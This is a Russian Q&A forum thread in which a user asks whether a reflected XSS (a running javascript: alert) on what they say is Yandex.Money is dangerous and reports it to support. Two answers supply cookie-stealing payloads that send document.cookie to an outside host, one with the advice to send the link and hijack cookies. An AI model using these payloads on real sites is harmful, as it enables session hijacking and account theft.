Как проверить XSS уязвимость?

Question

Nimor @Nimor

Информационная безопасность

Как проверить XSS уязвимость?

Выполняется: javascript: alert('xss')

Опасно? Стоит писать саппорту или пошлют меня?

Вопрос задан более трёх лет назад
6461 просмотр

Комментировать

Подписаться 7 Оценить Комментировать

Пригласить эксперта

Ответы на вопрос 5

Комментировать

1 комментарий

Комментировать

1 комментарий

Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы

Карьера в IT

+1 ещё

Простой
Куда расти ИБ специалисту?
- 4 подписчика
- 19 часов назад
- 542 просмотра
2

ответа
Информационная безопасность

+1 ещё

Средний
Можно ли обычного сис администратора назначить Администратором СКЗИ?
- 2 подписчика
- вчера
- 399 просмотров
3

ответа
Информационная безопасность

+1 ещё

Простой
Публикация файлов в интернете только после утверждения ИБ. Что использовать?
- 1 подписчик
- 15 нояб.
- 98 просмотров
1

ответ
Linux

+1 ещё

Простой
Какой дистрибутив выбрать для инфбеза?
- 1 подписчик
- 15 нояб.
- 1222 просмотра
8

ответов
Информационная безопасность

Простой
Как мошенники делают на Госуслугах красную табличку «Кабинет занят, с ним работает оператор» и как этому противодействовать?
- 1 подписчик
- 14 нояб.
- 386 просмотров
2

ответа
Ubuntu

+2 ещё

Простой
Хакнули сервер, как избавиться от майнеров?
- 2 подписчика
- 04 нояб.
- 528 просмотров
3

ответа
Linux

+1 ещё

Средний
Как сделать Linux более безопасным?
- 2 подписчика
- 28 окт.
- 897 просмотров
6

ответов
Информационная безопасность

+1 ещё

Средний
Обеспечивает ли HTTPS полное шифрование и невозможность компрометации данных?
- 4 подписчика
- 26 окт.
- 4899 просмотров
8

ответов
Компьютерные сети

+2 ещё

Простой
Заблокированные сайты свободно открываются без VPN — почему?
- 1 подписчик
- 24 окт.
- 21721 просмотр
7

ответов
Информационная безопасность

+1 ещё

Простой
Я хочу разделить хостинг который я буду арендовать между мной и другим человеком. Это нормально?
- 1 подписчик
- 16 окт.
- 350 просмотров
2

ответа
Показать ещё Загружается…

Специалист по управлению уязвимостями (информационная безопасность)

Гринатом • Москва

от 100 000 до 120 000 ₽

Старший специалист по информационной безопасности (аттестация ОИ)

Гринатом • Москва

До 120 000 ₽

Руководитель направления информационной безопасности ОКИИ

Интер РАО – Управление сервисами • Санкт-Петербург

от 180 000 ₽

Подружить дизайн Figma с сайтом на Bitrix

26 нояб. 2024, в 18:10

50000 руб./за проект

Разработать контент-план и стратегию продвижения студии косметологии

26 нояб. 2024, в 18:08

15000 руб./за проект

Копия форума на XenForo 2 + автоматический парсинг нового контента

26 нояб. 2024, в 17:25

30000 руб./за проект

Answer 1 · 2012-01-19 13:34:27

Nimor @Nimor Автор вопроса

Отписал в поддержку Яндекса, в общем все равно что-то да выполняется, это же плохо.

Ответ написан более трёх лет назад

Комментировать

Answer 2 · 2012-01-19 13:00:27

Выполняется в GET запросе? Подставляем вместо алерта

<script>
document.location="http://yoursite.com/hack.php?cookie=" + document.cookie;document.location="http://www.site.com"
</script>

Где hack.php — наш простенький скрипт по сохранению кукисов. Шлем ссылку, угоняем куки.

Answer 3 · 2012-01-19 13:14:58

Nimor @Nimor Автор вопроса

"<" and ">" запрещены. Это опять на yandex-money. Зато "<" and ">" работают в поле javascript: alert('< >')

Ответ написан более трёх лет назад

Комментировать

Answer 4 · 2012-01-19 13:16:15

Если у Вас выполняется alert('xss'), то и какой-нибудь

var t=new Image();t.src='http://google.com/sniffer/?'+document.cookie;

Должен выполниться.

Answer 5 · 2012-01-19 13:17:26

Nimor @Nimor Автор вопроса

Понятно, я не знаю что такое sniffer, это опасно или нет?

Ответ написан более трёх лет назад

1 комментарий

Как проверить XSS уязвимость?

Войдите, чтобы написать ответ

Минуточку внимания

Войдите на сайт